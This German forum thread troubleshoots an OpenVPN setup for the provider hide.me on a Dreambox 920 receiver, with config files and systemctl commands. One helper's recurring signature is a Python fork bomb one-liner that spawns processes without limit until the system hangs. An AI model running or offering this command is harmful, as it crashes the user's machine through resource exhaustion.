[gelöst] DB920 VPN einrichten (hide.me)

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • [gelöst] DB920 VPN einrichten (hide.me)

      Hallo zusammen,

      Ich benötige Hilfe bei dem einrichten des VPN plugin aus dem Feed.
      Vorher hatte ich eine dreambox 800sev2 nur die Datein scheinen nicht mehr zu funktionieren.

      1) das VPN plugin scheint für cyberghost optimiert zu sein.. Zumindest steht der Name oben im Fenster. Gibt es eine normale OpenVPN Variante??

      2) hat evtl schon jemand hide.me als VPN am Laufen bekommen??

      3) welche Datein benötige ich genau von meinem Anbieter?? Die Kürzel im plugin heißen bei meinem Anbieter (die Datei Namen) alle anders.

      Bevor wieder jemand schreit google doch bitte..
      Dies habe ich schon mehrere Stunden und finde dazu nichts passendes.

      Wäre super, wenn Mir jemand helfen könnte.

      Danke

      Info :
      Dreambox 920
      Neuste newnigma2 Os2.5 dayli
      Frisch geflasht
    • Hallo
      Danke für die links, aber die habe ich natürlich schon gesehen ;)

      Ich habe jetzt mal einfach die Daten, wie im link beschrieben eingefügt. Im CyberGhost VPN Plugin ganz unten Benutzer und Password eingeben.
      Andere Einstellungen habe ich nicht geändert.



      Status:
      Active: activating (auto-restart) (Result: exit-code) since Fri 2019-

      Die IP hat sich nicht gändert !!


      Als Info:
      Netzwerk läuft sonst super. Habe den Samba Server am Laufen (Freigaben unter Windows 10) und die Ordner von meiner Synology sind gemountet in der Dreambox.


      Hier meine Config Daten:

      Dateiname: Roosendaal.ovpn

      client
      dev tun
      proto udp
      remote roosendaal.hide.me 4000
      cipher AES-256-CBC
      auth SHA256
      resolv-retry infinite
      nobind
      persist-key
      persist-tun
      mute-replay-warnings
      verb 3
      auth-user-pass userpass.txt
      reneg-sec 0
      remote-cert-tls server
      verify-x509-name "*.hide.me" name
      tls-version-min 1.2
      key-direction 0

      <ca>
      -----BEGIN CERTIFICATE-----
      ********* viele zeichen ********
      -----END CERTIFICATE-----
      </ca>

      <tls-auth>
      -----BEGIN OpenVPN Static key V1-----
      ********* viele zeichen ********
      -----END OpenVPN Static key V1-----
      </tls-auth>

      Dateiname: userpass.txt

      ****Benutzermane****
      ****Password****
    • Die normale variante ist das Paket Openvpn die config ist /etc/openvpn/openvpn.conf .
      Ihr postet doch eure config warum nehmt ihr die nicht? ins verzeichnis damit richtig benennen und openvpn starten
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo..

      Mein Fehler, habe sie in openvpn. Conf umbenannt.
      Laut Anzeige steht die Verbindungen, aber die IP ändert sich nicht.
      Habe dir das ja schon berichtet.

      Benötige anscheinend eine normale Version von open VPN für die DB920.
      Keine cyberghost Variante.


      Grüße
    • Hallo ..

      habe ich natürlich gemacht ..
      Das Cyberghost Plugin Verbindet sich .. aber die IP bleibt die gleiche ;( Also kein Tunnel aufbau.

      Habe auf Fotos gesehen, das es mal eine alte normale VPN Version gibt - die ich nur nirgends finde!!!

      Hat die zufällig noch jemand rumliegen!? (OE2.5) Dann kann ich das Plugin wie auf der DB800se v2 einfach per Zertifikat einrichten und gut ist ;)
    • Hallo...

      Sorry habe ich aus der Standart Datei kopiert.
      Dateiname ist natürlich:

      Openvpn.Conf
      Password.txt (nicht userpass.txt) (Datei heisst auch natürlich Password.txt)

      Das plugin verbindet sich, aber die IP bleibt halt gleich.

      Verzweifle langsam...
      Heute mehrere Stunden gelesen, aber finde keinen Fehler!

      Poste morgen nochmal meine Daten.
    • Offensichtlich schaust du nicht richtig und das wunderplugin aus dem anderen Board hilft wohl auch nicht.
      Groß und kleinschreibung beachten bei openvpn.conf es muss kleingeschrieben werden.
      auth-user-pass /etc/openvpn/Password.txt wäre korrekt
      Den rest könnte ich nur mit der kristallkugel überprüfen die hab ich aber verliehen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo zusammen,

      1) erstemal Danke für die Hilfe
      2) ich habe dies alles von meine Smartphone geschrieben, und da kommt es schonmal vor das "gross" und "klein" Schreibung schon mal korregiert wird.
      daher, ich achte schon sehr darauf was ich lese.

      3) auth-user-pass /etc/openvpn/Password.txt -> es reicht auch nur "auth-user-pass password.txt" bzw. "auth-user-pass Password.txt"


      4) Habe natürlich das Super-Tool OpenVPNManager getestet. in Version 2.72 und 2.62


      5) OVPNManager benötigt eine -> server.conf <- und eine Erweiterung in der ".conf" (sonst gleich mit der openvpn.conf) mit:


      status /etc/openvpn/openvpn.stat 10
      management localhost 7505

      habe ich natürlich eingetragen!

      6) hier auch das Problem das er sich vermeitlich verbindet, aber nicht raus geht. Dazu habe ich in der DB920 einen IP Check eingestellt umd dies direkt zu kontrollieren. (siehe Foto)

      7) Datein:
      • startzeit.stat (vom Plugin)
      • server.conf.txt (vom openVPN Manger Generiert)
      • server.conf (Meine Hideme Datei Conf OVPN Manager)
      • password.txt
      • openvpn.stat (vom Plugin)
      • openvpn.conf (Meine Hideme Datei Conf CybergostVPN Plugin)




      Hier nochmal meine Config - > die ich auch benutze!:

      password.txt
      *Name*
      *Password*

      openvpn.conf
      client
      dev tun
      proto udp
      remote lu.hide.me 4000
      cipher AES-256-CBC
      auth SHA256
      resolv-retry infinite
      nobind
      persist-key
      persist-tun
      mute-replay-warnings
      verb 3
      auth-user-pass password.txt
      reneg-sec 0
      remote-cert-tls server
      verify-x509-name "*.hide.me" name
      tls-version-min 1.2
      key-direction 0

      -----BEGIN CERTIFICATE----

      usw.

      The post was edited 3 times, last by ultra-S ().

    • nochmal zum mitschreiben deine config hätte ich in 10 sek am laufen aber du liest ja nicht denn du brauchst weder eines stat datei die automatisch angelegt wird noch den manager noch mein plugin nur die ovpn korrekt ausgefüllt und in openvpn.conf umbennant.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ja ich weiss, das ich die anderen Datein nicht brauche.

      Das man nur die openvpn.conf + password.txt benötigt!
      Die Config habe ich aber so von meinem Anbieter bekommen!

      Ich probiere gerade nur alles aus um das am laufen zu bekommen - und ja, ich habe das jetzt mit gepostet, weil es vielleicht wichtig sein könnte.

      Wenn ich den Manager nicht benötige und dein Plugin auch nicht ..
      Soll ich genau was benutzen?! Ich finde im Feed keine NORMALE OpenVPN Variante!

      und wie gesagt - das Plugin von dir (was ich wohl nicht brauche) sagt den Status ACTIV ..

      Würde meine zeit (wie du) gerne auch anderes Verbringen anstatt mit dem rumbasteln dieser Sache.
      Wie gesagt bei meiner 800er hatte ich das auch in 5min am laufen.

      Würde mich echt freuen - keine vorwürfe zu bekommen, sondern eine Kurze anleitung demit ich und natürlich du das Thema bei seite legen können. DANKE wie immer für deine Hilfe!!

      The post was edited 1 time, last by ultra-S ().

    • feed.newnigma2.to/daily/oe2.5/…vpn_2.4.7-r12.0_armhf.deb
      Ohne jegliches plugin kann man ihn mit der richtigen config laufen lassen da braucht man nur openvpn_2.4.7-r12.0_armhf.deb.
      Und da ich keine lust mehr habe basics immer und immer zu wiederholen bin ich hier raus alles was benötigt wird steht hier.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo,

      DANKE!.
      habe das Plugin auch schon aus dem Feed installiert. Hier bekomme ich aber kein ICON unter den Einstellung angezeigt. Daher dachte ich das dies Fehlerhaft ist.
      Habe es jetzt nochmal installiert .. wenn mir jemand noch sagen könnte wie man das ICON zum Einstellen her zaubern kann bin ich sicher es hin zu bekommen.
    • Ich habe keine Ahnung von OpenVPN. Aber in den ganzen Threads und Antworten, die du bekommen hast, habe ich verstanden, dass es KEIN Plugin gibt, das dir die VPN Konfiguration erstellen wird.
      Ich habe aber auch verstanden, dass du das gar nicht brauchst.

      OpenVPN, ohne irgendein Plugin, installieren, Config reinladen, OpenVPN per Konsole starten, Autostart aktivieren. Fertig.
    • Hallo zusammen,

      1) ich habe am Anfang schon gesagt das ich anscheinend mit Cyberghost Plugin ein falsches habe
      2) Meine Config steht .. und läuft überall, wollte nur zwischen durch eine Info ob ich einen fehler habe.
      3) Ich suchte eine Variante ohne alles - die ich schon vor Tagen auf dem Feed gefunden habe und natürlich installiert habe.
      Habe nur kein Icon gefunden - für eine kleine Oberfläche zum straten der Config (wie beider DB 800se). Daher dachte ich dies Funktioniert nicht.

      Und es tut mir leider, wenn nicht jeder sofort alles weiss - und ich nicht so im Thema bin. Dafür gibt es doch ein Forum, für die die gerne weiter kommen und es lernen möchten.

      Wenn man nur bei 0 anfängt - immer wieder gesagt bekommt, ist doch ganz einfach - Natürlich, wenn die Backgrounds hat - ist es einfach.


      zurück zum Thema,
      das OpenVPN vom Feed habe ich installiert und die Conf wieder in den Ordner gepackt.

      Per:
      1) ln -s /lib/systemd/system/openvpn\openvpn.service\
      2) systemctl -f enable openvpn.service

      Den Service gestartet (denke das ist so richtig=!?)


      3)
      wget checkip.dyndns.org/ -q -O - |grep -Eo '\<[[:digit:]]{1,3}(\.[[:digit:]]{1,3}){3}\>'

      Um die die IP zu testen. Keine Änderung ;(
    • systemctl enable openvpn@openvpn <--- Autostart
      systemctl start openvpn@openvpn <--- was könnte das wohl sein?
      systemctl stop openvpn@openvpn <--- das gegnteil vom letzten punkt

      systemctl status openvpn@openvpn <--- zeigt dir den status

      cat /var/log/openvpn.log <----- zeigt dir das logfile auf konsole an
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Super, DANKE für die Telnet befehle.

      Anscheinend Läuft der Client, aber meine IP hat sich immer noch nicht gändert.
      Die Antriebute habe ich auf "755" gändert. Dachte könnte helfen. Hat es leider nicht.


      Werde jetzt mal einen Ticker bei meine VPn anbieter aufmachen. Kann ja nicht sein, dass ich (und natürlich IHR) Zeit investiert und es an etwas kleine harpert.





      The post was edited 1 time, last by ultra-S ().